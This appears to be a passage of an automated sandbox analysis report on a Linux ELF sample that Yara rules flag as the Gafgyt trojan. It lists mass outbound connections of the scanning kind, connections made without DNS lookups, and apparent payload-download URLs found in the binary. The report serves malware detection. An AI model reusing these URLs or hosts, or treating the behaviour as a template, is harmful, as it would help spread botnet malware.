Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.83.11.242:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.158.82.144:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.165.163.193:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.249.84.243:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.85.75.142:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.235.139.158:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.129.222.227:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.97.228.215:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.13.255.159:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.249.132.239:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.71.44.192:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.23.184.10:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.167.205.248:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.12.9.14:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.66.176.88:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.191.106.215:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.2.14.204:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.49.157.82:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.214.238.80:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.80.188.163:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.198.89.91:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.169.223.242:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.19.2.197:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.104.70.165:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.13.175.93:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.10.126.196:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.18.229.68:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.113.196.151:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.123.93.233:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.97.2.5:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.82.247.22:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.192.171.61:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.247.46.238:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.199.106.168:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.163.175.149:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.161.215.165:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.94.34.100:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.46.218.47:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.112.63.177:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.182.136.96:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.204.120.113:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.144.200.221:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.143.72.116:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.149.9.5:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.184.252.4:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.146.128.23:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.96.125.59:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.108.180.191:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.7.137.117:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.101.100.155:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.112.229.100:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.233.93.82:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.86.55.58:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.185.187.57:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.207.208.52:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.160.97.221:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.25.38.69:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.115.239.18:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.1.31.54:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.57.9.114:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.122.17.251:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.119.80.49:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.155.140.156:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.126.79.187:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.165.52.85:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.232.82.191:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.124.182.121:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.41.67.253:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.157.223.51:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.169.221.27:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.109.104.214:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.124.218.210:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.40.180.183:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.231.61.70:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.224.32.75:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.57.130.84:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.242.77.185:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.127.27.176:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.29.149.185:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.107.188.207:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.200.125.51:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.14.51.250:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.155.239.242:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.192.226.144:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.34.153.123:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.131.113.220:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.119.10.3:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.21.32.162:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.45.158.149:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.70.245.166:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.76.15.225:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.250.19.92:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.16.27.211:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.225.167.40:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.48.172.145:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.6.48.159:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.35.108.100:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.244.191.203:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.126.70.196:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.51.94.119:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.150.20.28:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.242.200.119:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.250.94.173:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.172.199.18:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.203.215.25:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.113.67.91:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.21.3.48:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.163.148.237:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.71.244.149:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.80.235.34:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.165.205.226:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.130.129.255:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.68.80.14:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.14.38.224:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.248.175.127:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.86.99.184:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.221.166.119:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.195.90.206:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.180.20.137:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.230.172.91:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.199.32.73:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.173.160.144:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.161.116.230:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.111.178.187:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.11.214.116:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.190.151.180:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.91.70.220:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.80.65.195:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.155.110.204:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.155.157.96:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.207.167.7:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.4.146.11:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.198.70.244:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.42.151.102:60001
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.5.178.149:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.88.119.19:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.226.231.95:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.142.13.40:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.105.17.219:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.105.243.165:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.18.157.25:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.97.43.40:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.132.196.3:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.214.88.218:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.145.155.130:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.78.221.152:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.92.127.164:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.24.109.74:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.58.76.71:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.254.111.153:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.95.221.64:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.146.168.153:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.71.182.67:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.20.98.146:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.250.29.102:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.151.126.134:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.64.99.187:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.70.196.119:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.112.127.18:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.68.137.174:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.25.19.234:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.87.207.196:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.188.57.221:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.29.26.212:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.185.87.97:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.100.56.51:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.64.157.193:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.119.249.187:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.32.151.106:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.81.29.104:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.137.39.167:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.103.75.163:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.175.10.177:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.112.9.250:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.116.161.222:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.7.240.223:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.157.186.97:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.8.200.211:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.159.234.105:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.210.221.9:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.27.222.137:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.245.251.180:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.34.33.218:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.90.30.127:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.147.232.52:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.153.192.208:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.251.109.45:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.28.38.115:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.84.14.245:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.153.199.178:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.158.136.98:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.142.53.60:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.251.82.66:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.178.112.163:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.183.80.202:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.50.250.62:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.3.37.194:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.131.59.190:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.216.124.9:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.162.198.13:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.45.187.46:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.153.96.184:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.55.177.54:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.81.92.14:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.65.198.105:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.8.95.27:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.65.9.142:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.153.120.224:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.98.255.119:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.24.145.241:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.199.22.87:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.224.23.102:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.188.164.147:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.106.231.70:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.54.5.80:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.17.113.108:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.28.178.221:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.183.170.121:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.61.96.48:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.5.105.241:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.69.141.185:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.111.111.183:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.187.11.126:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.74.76.160:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.101.79.158:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.180.59.242:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.128.19.121:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.112.98.88:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.213.26.174:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.42.42.40:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.83.26.86:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.130.196.72:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.192.188.19:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.122.245.78:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.242.209.143:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.0.165.35:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.11.202.224:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.128.153.191:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.6.106.170:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.3.151.45:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.153.214.148:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.172.219.90:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.77.57.100:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.139.145.0:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.67.61.206:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.210.24.168:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.132.7.38:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.28.98.26:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.25.246.124:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.234.124.13:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.74.62.208:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.52.182.107:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.34.102.103:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.226.108.140:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.135.196.195:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.157.209.42:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.39.240.249:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.80.77.136:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.105.99.68:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.190.253.171:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.168.16.117:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.76.44.192:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.105.145.125:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.231.230.0:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.80.231.177:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.178.185.211:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.181.101.40:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.203.149.236:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.123.1.161:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.255.160.220:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.161.95.172:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.48.113.153:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.240.202.156:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.135.65.160:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.62.93.161:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.186.234.57:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.224.110.70:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.6.162.40:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.37.25.204:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.14.116.33:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.221.230.103:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.185.110.75:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.164.150.10:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.59.203.147:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.2.36.54:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.231.105.224:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.230.160.234:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.157.218.133:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.172.82.127:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.115.30.111:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.199.211.210:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.255.28.231:5500
Source: global traffic TCP traffic: 192.168.2.23:60586 -> 81.83.176.221:5500
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.125.178.149:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.47.194.149:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.61.105.19:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.72.208.53:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.128.166.114:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.206.188.13:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.18.51.166:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.126.190.38:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.141.124.38:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.128.22.208:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.90.240.14:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.55.56.11:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.153.243.82:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.81.233.140:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.205.156.87:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.146.161.59:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.255.73.177:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.129.187.130:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.19.209.178:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.113.195.41:5501
Source: global traffic TCP traffic: 192.168.2.23:58282 -> 81.152.148.185:5501
Source: unknown TCP traffic detected without corresponding DNS query: 101.229.107.168
Source: unknown TCP traffic detected without corresponding DNS query: 185.155.224.226
Source: unknown TCP traffic detected without corresponding DNS query: 188.70.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 176.133.211.72
Source: unknown TCP traffic detected without corresponding DNS query: 182.163.165.214
Source: unknown TCP traffic detected without corresponding DNS query: 213.164.50.112
Source: unknown TCP traffic detected without corresponding DNS query: 212.219.194.149
Source: unknown TCP traffic detected without corresponding DNS query: 151.117.164.206
Source: unknown TCP traffic detected without corresponding DNS query: 43.37.101.86
Source: unknown TCP traffic detected without corresponding DNS query: 182.72.203.46
Source: unknown TCP traffic detected without corresponding DNS query: 213.127.254.23
Source: unknown TCP traffic detected without corresponding DNS query: 117.29.178.149
Source: unknown TCP traffic detected without corresponding DNS query: 78.71.60.18
Source: unknown TCP traffic detected without corresponding DNS query: 43.58.39.95
Source: unknown TCP traffic detected without corresponding DNS query: 81.163.77.78
Source: unknown TCP traffic detected without corresponding DNS query: 213.27.156.239
Source: unknown TCP traffic detected without corresponding DNS query: 113.235.73.8
Source: unknown TCP traffic detected without corresponding DNS query: 117.170.16.226
Source: unknown TCP traffic detected without corresponding DNS query: 61.20.111.144
Source: unknown TCP traffic detected without corresponding DNS query: 118.253.31.230
Source: unknown TCP traffic detected without corresponding DNS query: 94.19.108.51
Source: unknown TCP traffic detected without corresponding DNS query: 113.184.109.46
Source: unknown TCP traffic detected without corresponding DNS query: 101.59.254.239
Source: unknown TCP traffic detected without corresponding DNS query: 81.72.138.131
Source: unknown TCP traffic detected without corresponding DNS query: 2.226.198.219
Source: unknown TCP traffic detected without corresponding DNS query: 190.114.155.186
Source: unknown TCP traffic detected without corresponding DNS query: 85.177.97.5
Source: unknown TCP traffic detected without corresponding DNS query: 88.249.15.71
Source: unknown TCP traffic detected without corresponding DNS query: 81.248.14.206
Source: unknown TCP traffic detected without corresponding DNS query: 95.236.41.249
Source: unknown TCP traffic detected without corresponding DNS query: 95.57.182.53
Source: unknown TCP traffic detected without corresponding DNS query: 85.7.136.197
Source: unknown TCP traffic detected without corresponding DNS query: 218.139.60.233
Source: unknown TCP traffic detected without corresponding DNS query: 117.28.140.131
Source: unknown TCP traffic detected without corresponding DNS query: 188.215.183.162
Source: unknown TCP traffic detected without corresponding DNS query: 61.230.8.67
Source: unknown TCP traffic detected without corresponding DNS query: 188.142.150.88
Source: unknown TCP traffic detected without corresponding DNS query: 61.127.6.27
Source: unknown TCP traffic detected without corresponding DNS query: 112.129.152.235
Source: unknown TCP traffic detected without corresponding DNS query: 95.55.139.8
Source: unknown TCP traffic detected without corresponding DNS query: 88.176.83.36
Source: unknown TCP traffic detected without corresponding DNS query: 24.141.86.196
Source: unknown TCP traffic detected without corresponding DNS query: 95.61.49.193
Source: unknown TCP traffic detected without corresponding DNS query: 181.33.218.30
Source: unknown TCP traffic detected without corresponding DNS query: 43.247.220.151
Source: unknown TCP traffic detected without corresponding DNS query: 121.200.172.169
Source: unknown TCP traffic detected without corresponding DNS query: 43.43.35.211
Source: unknown TCP traffic detected without corresponding DNS query: 213.202.218.66
Source: unknown TCP traffic detected without corresponding DNS query: 81.248.20.39
Source: unknown TCP traffic detected without corresponding DNS query: 81.205.5.5
Source: x86.elf String found in binary or memory: http://188.132.232.158/laws;
Source: x86.elf String found in binary or memory: http://188.132.232.158/mips
Source: x86.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: x86.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: x86.elf String found in binary or memory: https://urlhaus.abuse.ch/downloads/text_online/
Source: unknown Network traffic detected: HTTP traffic on port 59050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown Network traffic detected: HTTP traffic on port 57770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59050
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown HTTPS traffic detected: 54.171.230.55:443 -> 192.168.2.23:33606 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
